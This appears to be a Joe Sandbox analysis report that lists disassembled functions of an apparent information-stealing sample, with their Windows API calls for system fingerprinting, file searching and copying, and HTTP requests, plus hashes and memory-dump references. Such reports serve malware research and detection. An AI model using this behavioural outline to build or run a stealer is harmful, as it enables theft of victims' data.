Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
Instruction ID: a64f93d993f1e87f951aacd978fe42101be04856bc676c4d6d5bcee74d417e49
Opcode Fuzzy Hash: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
Instruction Fuzzy Hash: F0F08230900605FFEB20ABA0EC09BFE7736AF04715F11441BB916A51D5CBF89582CA6E

Function 00414CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,0273B6D0), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,0273AD48,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08

Strings

ERROR, xrefs: 00414CFA
ERROR, xrefs: 00414D53

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: c9138222a55dae4a6641ab91aade121dbb9fb8a91a2cfec8e4ac659c811cf2fa
Instruction ID: 9b7a9698bb488a37f3de611b15de8acf20b28e6af01427a962a44d236a29daab
Opcode Fuzzy Hash: c9138222a55dae4a6641ab91aade121dbb9fb8a91a2cfec8e4ac659c811cf2fa
Instruction Fuzzy Hash: 7F113330901108B7CB14FF61DC56AED7338AF50354F90816EF80B5A5A2EF786B95C75A

Function 00414A20 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414A5A
lstrcat.KERNEL32(?,00421040), ref: 00414A77
lstrcat.KERNEL32(?,02736988), ref: 00414A8B
lstrcat.KERNEL32(?,00421044), ref: 00414A9D

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 3426ebc578b02c432677cdb303f2b9e3c7d278b9310541b44e93795a92bf0f87
Instruction ID: 8dbf70b05384144c92fb0b395b2fe843caac1dc39a8cdd365ca80c12b48963c0
Opcode Fuzzy Hash: 3426ebc578b02c432677cdb303f2b9e3c7d278b9310541b44e93795a92bf0f87
Instruction Fuzzy Hash: B6214F76A002086BC724FBA0EC42EDD373DAF94304F40845EB94A571D1EE7856C98BA5

Function 00414690 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 004146CA
lstrcat.KERNEL32(?,0273A4E0), ref: 004146E8

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
Part of subcall function 004143F0: lstrcat.KERNEL32(?,02736A08), ref: 0041452A
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611

Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144E7

Strings

5\A, xrefs: 0041470F, 00414744, 0041477A, 004147AF, 004147E5, 0041481A, 0041483F, 00414712, 00414747, 0041477D, 004147B2, 004147E8, 0041481D

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 5\A
API String ID: 2104210347-3392445751
Opcode ID: 40d424ef235f329345acbbde453707475739f07353333ae1a21f4574a095ce7a
Instruction ID: 53e7b7cde32fa2def73dba0ef3da04c4d4f6f11e0d96676858e1097c5765331f
Opcode Fuzzy Hash: 40d424ef235f329345acbbde453707475739f07353333ae1a21f4574a095ce7a
Instruction Fuzzy Hash: 1441EBB660010467CB64FB64EC83EEE333DAB84304F40855EB94997191ED795ACD8BE6

Function 00417380 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5

Function 6C583060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C583095

Part of subcall function 6C5835A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C60F688,00001000), ref: 6C5835D5
Part of subcall function 6C5835A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5835E0
Part of subcall function 6C5835A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5835FD
Part of subcall function 6C5835A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C58363F
Part of subcall function 6C5835A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C58369F
Part of subcall function 6C5835A0: __aulldiv.LIBCMT ref: 6C5836E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C58309F

Part of subcall function 6C5A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5A56EE,?,00000001), ref: 6C5A5B85
Part of subcall function 6C5A5B50: EnterCriticalSection.KERNEL32(6C60F688,?,?,?,6C5A56EE,?,00000001), ref: 6C5A5B90
Part of subcall function 6C5A5B50: LeaveCriticalSection.KERNEL32(6C60F688,?,?,?,6C5A56EE,?,00000001), ref: 6C5A5BD8
Part of subcall function 6C5A5B50: GetTickCount64.KERNEL32 ref: 6C5A5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5830BE

Part of subcall function 6C5830F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C583127
Part of subcall function 6C5830F0: __aulldiv.LIBCMT ref: 6C583140

Part of subcall function 6C5BAB2A: __onexit.LIBCMT ref: 6C5BAB30

Memory Dump Source

Source File: 00000000.00000002.2467880515.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.2467837720.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2468031294.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2468067392.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 535f1a275e81da6e1b61a91805af3cebe1190cf00398d4e78f332369611ba8d2
Instruction ID: 81bc1c80892ed7bac5aa6b1f7c17b7ebf136c7a24cdca1aa35dcdc0a53420fda
Opcode Fuzzy Hash: 535f1a275e81da6e1b61a91805af3cebe1190cf00398d4e78f332369611ba8d2
Instruction Fuzzy Hash: A5F0A222F3074896CB10DF758D911A6B770AFAA214F50171DE84573551FB2066D8838A

Function 00418F10 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00418F24
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00418F45
CloseHandle.KERNEL32(00000000), ref: 00418F4F

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 904f881645263b8d6980a0d5e63786ab633fa25ddeb60b9bffeff93c14b2dbd8
Instruction ID: 429e76ffcb292cc7325fe34a8c967f3e8a19cc1fb06d1469951f90a9fbb0bdee
Opcode Fuzzy Hash: 904f881645263b8d6980a0d5e63786ab633fa25ddeb60b9bffeff93c14b2dbd8
Instruction Fuzzy Hash: 29F05E74A0020CFBDB14DFA4DD4AFEE7779AB08700F004498BB0997290D6B0AE85CB94

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C

Function 00411520 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00416FA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
Part of subcall function 00416FA0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
Part of subcall function 00416FA0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
Part of subcall function 00416FA0: HeapAlloc.KERNEL32(00000000), ref: 004170AA

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 00417130: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
Part of subcall function 00417130: HeapAlloc.KERNEL32(00000000), ref: 0041714B

Part of subcall function 00417260: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041D5B0,000000FF,?,004117A9,00000000,?,0273A680,00000000,?), ref: 00417292
Part of subcall function 00417260: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041D5B0,000000FF,?,004117A9,00000000,?,0273A680,00000000,?), ref: 00417299

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 00417420: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DD0,00000000,?), ref: 00417450
Part of subcall function 00417420: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DD0,00000000,?), ref: 00417457
Part of subcall function 00417420: GetLocalTime.KERNEL32(?,?,?,?,?,00420DD0,00000000,?), ref: 00417464
Part of subcall function 00417420: wsprintfA.USER32 ref: 00417493

Part of subcall function 004174D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
Part of subcall function 004174D0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
Part of subcall function 004174D0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D

Part of subcall function 004175A0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 004175D5

Part of subcall function 00417630: GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
Part of subcall function 00417630: LocalAlloc.KERNEL32(00000040,?), ref: 00417699
Part of subcall function 00417630: GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
Part of subcall function 00417630: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
Part of subcall function 00417630: LocalFree.KERNEL32(00000000), ref: 004177C2

Part of subcall function 00417820: GetSystemPowerStatus.KERNEL32(?), ref: 0041784D

GetCurrentProcessId.KERNEL32(00000000,?,0273A460,00000000,?,00420DF4,00000000,?,00000000,00000000,?,02739E00,00000000,?,00420DF0,00000000), ref: 00411B8E

Part of subcall function 00418F10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00418F24
Part of subcall function 00418F10: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00418F45
Part of subcall function 00418F10: CloseHandle.KERNEL32(00000000), ref: 00418F4F

Part of subcall function 004178A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
Part of subcall function 004178A0: HeapAlloc.KERNEL32(00000000), ref: 004178DE
Part of subcall function 004178A0: RegOpenKeyExA.KERNEL32(80000002,02719998,00000000,00020119,?), ref: 004178FE
Part of subcall function 004178A0: RegQueryValueExA.KERNEL32(?,0273A540,00000000,00000000,000000FF,000000FF), ref: 0041791F
Part of subcall function 004178A0: RegCloseKey.ADVAPI32(?), ref: 00417932

Part of subcall function 00417A00: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00417A69
Part of subcall function 00417A00: GetLastError.KERNEL32 ref: 00417A78

Part of subcall function 00417970: GetSystemInfo.KERNEL32(00420DFC), ref: 004179A0
Part of subcall function 00417970: wsprintfA.USER32 ref: 004179B6

Part of subcall function 00417BA0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,027397B8,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
Part of subcall function 00417BA0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,027397B8,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
Part of subcall function 00417BA0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
Part of subcall function 00417BA0: __aulldiv.LIBCMT ref: 00417C12
Part of subcall function 00417BA0: __aulldiv.LIBCMT ref: 00417C20
Part of subcall function 00417BA0: wsprintfA.USER32 ref: 00417C4C

Part of subcall function 00418260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DF8,00000000,?), ref: 004182CF
Part of subcall function 00418260: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DF8,00000000,?), ref: 004182D6
Part of subcall function 00418260: wsprintfA.USER32 ref: 004182F0

Part of subcall function 00417DC0: RegOpenKeyExA.KERNEL32(00000000,027370C8,00000000,00020019,00000000,004205A6), ref: 00417E44

Part of subcall function 00417DC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
Part of subcall function 00417DC0: wsprintfA.USER32 ref: 00417EF9
Part of subcall function 00417DC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
Part of subcall function 00417DC0: RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
Part of subcall function 00417DC0: RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 00418120: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
Part of subcall function 00418120: Process32First.KERNEL32(?,00000128), ref: 0041817E
Part of subcall function 00418120: Process32Next.KERNEL32(?,00000128), ref: 00418193
Part of subcall function 00418120: FindCloseChangeNotification.KERNEL32(?), ref: 00418201

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041216B

Memory Dump Source

